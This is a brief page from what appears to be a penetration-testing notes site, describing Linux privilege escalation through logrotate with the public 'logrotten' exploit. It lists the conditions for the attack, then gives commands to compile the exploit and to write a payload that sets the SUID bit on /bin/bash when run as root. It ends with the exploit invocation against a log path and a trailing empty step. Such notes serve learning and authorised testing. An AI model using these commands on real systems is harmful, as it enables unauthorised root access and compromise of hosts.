search
githubEdit

Logrotate

hashtag
Resources: https://github.com/whotwagner/logrotten Logrotten

hashtag
REQUIREMENTS:

hashtag
1) Logrotate has to be executed as root

hashtag
2) The logpath needs to be in control of the attacker

hashtag
3)Any option that creates files is set in the logrotate configuration

hashtag
STEPS:

hashtag
1) Download binary from the repo, then compile

gcc logrotten.c -o logrotten

hashtag
2)

echo "if [ `id -u` -eq 0 ]; then (chmod +xs /bin/bash); fi" > payload

hashtag
3)

./logrotten -p ./payload /tmp/log/pwnme.log (Create option)

hashtag
3)

PreviousLinux Local Password AttacksNextManual Enumeration Commands

Last updated